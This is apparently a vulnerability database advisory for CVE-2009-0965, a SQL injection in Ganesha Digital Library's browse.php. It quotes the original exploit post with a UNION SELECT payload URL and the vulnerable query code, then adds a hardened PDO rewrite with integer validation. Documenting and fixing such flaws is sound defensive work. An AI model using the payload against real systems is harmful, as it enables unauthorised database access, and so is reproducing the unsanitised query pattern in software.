GDL 'functions/browse.php' SQL Injection Vulnerability

Vulnerability ID: 1117483
Vulnerability type: SQL injection
Published: 2009-03-17
Updated: 2009-04-01
CVE ID: CVE-2009-0965
CNNVD-ID: CNNVD-200903-322
Platform: PHP
CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/8228
https://cxsecurity.com/issue/WLB-2009030190
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-322
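|Vulnerability Details
A SQL injection vulnerability exists in functions/browse.php in Ganesha Digital Library (GDL) versions 4.0 and 4.2. A remote attacker can execute arbitrary SQL commands via the node parameter in a browse action to gdl.php.
|Exploit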
*******************************************************************************************
   [ Discovered by g4t3w4y \ jkthackerlink[at]gmail.com ]
   [ transitory only http://jakartaweb.net/home/GDL-Digital-Library-SQL-Injection-Vulnerability.html :) ]
 ###################################################
 #  [ GDL v.4.x ]    SQL Injection Vulnerability   #
 ###################################################
 #
 # Script:
 # GDL 4.0 | htdocs .gz
 # GDL 4.0 | windows application
 # GDL 4.2 | htdocs .zip
 #
 # Script site: http://kmrg.itb.ac.id
 # Download: http://kmrg.itb.ac.id
 #
 # [SQL] Vuln : http://localhost/gdl.php?mod=browse&node=0+AND+1=2+UNION+SELECT+0,1,2--
 #
 # Bug: ./functions/browse.php (line: 286-311)
 #
 # function browse_child_list($node)
 # {
 #     $strsql = "SELECT folder.*, folder_tree.NODE
 #                FROM folder, folder_tree
 #                WHERE
 #                    folder_tree.PARENT = '$node' AND
 #                    folder_tree.NODE = folder.NODE ";
 #   
 #     $dbres = mysql_query($strsql);               
 #
 #    if ($dbres){
 #            while ($row = mysql_fetch_array($dbres)){                  //  SQL inj
 #            $html .= browse_folder_print($row,2);
 #        }       
 #
 #         if (!empty($html)){
 #             $box_html = "<table cellSpacing=0 cellPadding=2 border=0>$html</table>";
 #             return $box_html;
 #         } else {
 #             return NULL;
 #         }   
 #     } else {
 #         stdout_error(mysql_error());
 #         return NULL;
 #     }
 # }
 ##################################################
 # Greetz: cozmaster * E-C-H-O Team * and otherz..           #
 ##################################################

 [ g4t3w4y / 2009 ]

*******************************************************************************************

# milw0rm.com [2009-03-17]
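
The function quoted in the advisory interpolates `$node` directly into the SQL string. The following is an added example, not GDL project code or a vendor patch, showing a hardened form of the same query with integer validation and a bound parameter. It assumes PDO in place of the original `mysql_*` calls; the function name `browse_child_rows`, the `NAME` column and the in-memory SQLite rows are constructed for the demonstration.

```php
<?php
// Added example: hardened rewrite of browse_child_list(); not GDL project code.
// Assumptions: PDO is available and NODE/PARENT are integer ids. The SQLite
// schema, the NAME column and the sample rows below are constructed.
function browse_child_rows(PDO $db, $node): array
{
    // Layer 1: reject anything that is not a plain non-negative integer.
    $id = filter_var($node, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        throw new InvalidArgumentException('node must be a non-negative integer');
    }
    // Layer 2: bind the value instead of interpolating it into the SQL text.
    $stmt = $db->prepare(
        'SELECT folder.*, folder_tree.NODE
           FROM folder JOIN folder_tree ON folder_tree.NODE = folder.NODE
          WHERE folder_tree.PARENT = :parent'
    );
    $stmt->bindValue(':parent', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE folder (NODE INTEGER PRIMARY KEY, NAME TEXT)');
$db->exec('CREATE TABLE folder_tree (NODE INTEGER, PARENT INTEGER)');
$db->exec("INSERT INTO folder VALUES (1, 'Theses'), (2, 'Journals')");
$db->exec('INSERT INTO folder_tree VALUES (1, 0), (2, 0)');

// Constructed inputs: a valid node id, then the decoded value from the advisory URL.
foreach (['0', '0 AND 1=2 UNION SELECT 0,1,2--'] as $input) {
    try {
        $rows = browse_child_rows($db, $input);
        printf("%s => %d rows\n", var_export($input, true), count($rows));
    } catch (InvalidArgumentException $e) {
        printf("%s => rejected: %s\n", var_export($input, true), $e->getMessage());
    }
}
```

The bound parameter alone is enough to keep the input out of the SQL grammar; the integer check additionally lets the application log or alert on malformed `node` values before any query is issued.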
|References

Source: XF
Name: gdl-node-sql-injection(49292)
Link: http://xforce.iss.net/xforce/xfdb/49292
Source: VUPEN
Name: ADV-2009-0751
Link: http://www.vupen.com/english/advisories/2009/0751
Source: BID
Name: 34144
Link: http://www.securityfocus.com/bid/34144
Source: MILW0RM
Name: 8228
Link: http://www.milw0rm.com/exploits/8228
Source: OSVDB
Name: 52803
Link: http://osvdb.org/52803